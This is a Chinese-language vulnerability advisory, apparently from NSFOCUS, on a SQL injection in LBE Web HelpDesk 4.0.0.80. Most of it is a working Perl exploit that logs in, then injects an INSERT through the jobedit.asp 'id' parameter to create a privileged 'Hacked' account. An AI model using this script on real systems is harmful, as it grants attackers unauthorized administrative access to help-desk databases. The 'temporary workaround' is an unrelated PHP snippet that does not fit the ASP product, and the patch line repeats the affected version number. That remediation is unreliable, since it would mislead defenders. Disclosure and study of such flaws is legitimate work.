安全研究
安全漏洞
Leigh Business Enterprises Web HelpDesk SQL注入漏洞
发布日期:2004-07-21
更新日期:2004-07-27
受影响系统:
Leigh Business Enterprises Web HelpDesk 4.0.0.80不受影响系统:
Leigh Business Enterprises Web HelpDesk 4.0.0.81描述:
BUGTRAQ ID: 10773
LBE Web Helpdesk是一款可通过WEB浏览器进行操作的Helpdesk系统。
LBE Web Helpdesk不正确过滤用户提交的数据,远程攻击者可以利用这个漏洞进行SQL注入攻击,可能获得敏感数据或修改数据库。
问题存在于jobedit.asp脚本对用户提交给'id'参数缺少过滤,提交包含恶意SQL命令的数据作为'id'参数,可修改'users'表,增加操作员相等权限的新用户。
<*来源:Noam Rathaus (noamr@beyondsecurity.com)
链接:http://www.securiteam.com/windowsntfocus/5QP0M0ADGI.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
use IO::Socket;
use strict;
my $host = $ARGV[0];
my $Path = $ARGV[1];
my $Email = $ARGV[2];
my $Password = $ARGV[3];
if (($#ARGV+1) < 4)
{
print "lbehelpdesk.pl host path email password\n";
exit(0);
}
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print "Getting default cookie\n";
my $http = "GET /$Path/oplogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,ima
ge/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
";
print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
my $Cookie = "";
while (<$remote>)
{
if (/Set-Cookie: ([^;]+;)/)
{
$Cookie .= $1." ";
}
# print $_;
}
print "\n";
close($remote);
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print "Logging in\n";
$remote->autoflush(1);
my $http = "POST /$Path/gstlogin.asp HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie
Content-Type: application/x-www-form-urlencoded
Content-Length: ";
my $content = "txtemail=$Email&txtpwd=$Password";
$http .= length($content)."
$content";
print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
my $success = 0;
while (<$remote>)
{
if (/Location: eval.asp/)
{
$success = 1;
print "Login successfull\n";
}
# print $_;
}
print "\n";
close $remote;
if (!$success)
{
print "Login failed\n";
exit(0);
}
$http = "GET /$Path/jobedit.asp?id=0%20;%20INSERT%20INTO%20users%20(%20user_name,".
"%20password,%20editactiontime,%20orgstructure,%20createviewtemplate,".
"%20removelogins,%20editlinkedfiles,%20newencrypt,%20showalljobs,".
"%20publishmacros,%20override_contract%20)%20VALUES%20('Hacked',".
"%20'60716363677F6274',%201,%201,%201,%201,%201,%20'Y',%201,".
"%201,%201) HTTP/1.1
Host: $host
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: close
Referer: http://192.168.1.243/lbehelpdesk/gstlogin.asp
Cookie: $Cookie
";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );
unless ($remote) { die "cannot connect to http daemon on $host" }
print "HTTP: [$http]\n";
print $remote $http;
sleep(1);
while (<$remote>)
{
if (/Unable to find Job id = 0 ; INSERT INTO users/g)
{
print "Successfully added record\nYou can now log on as Hacked/password (Username/Password)\n";
}
# print $_;
}
close($remote);
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在$nick = htmlspecialchars($nick);前插入if ($cadena_final) { unset($cadena_final); }代码。
厂商补丁:
Leigh Business Enterprises
--------------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Leigh Business Enterprises Web HelpDesk 4.0 .0.80:
Leigh Business Enterprises Upgrade weblatest.zip
http://www.lbehelpdesk.com/patch/web/weblatest.zip
浏览次数:3045
严重程度:0(网友投票)
绿盟科技给您安全的保障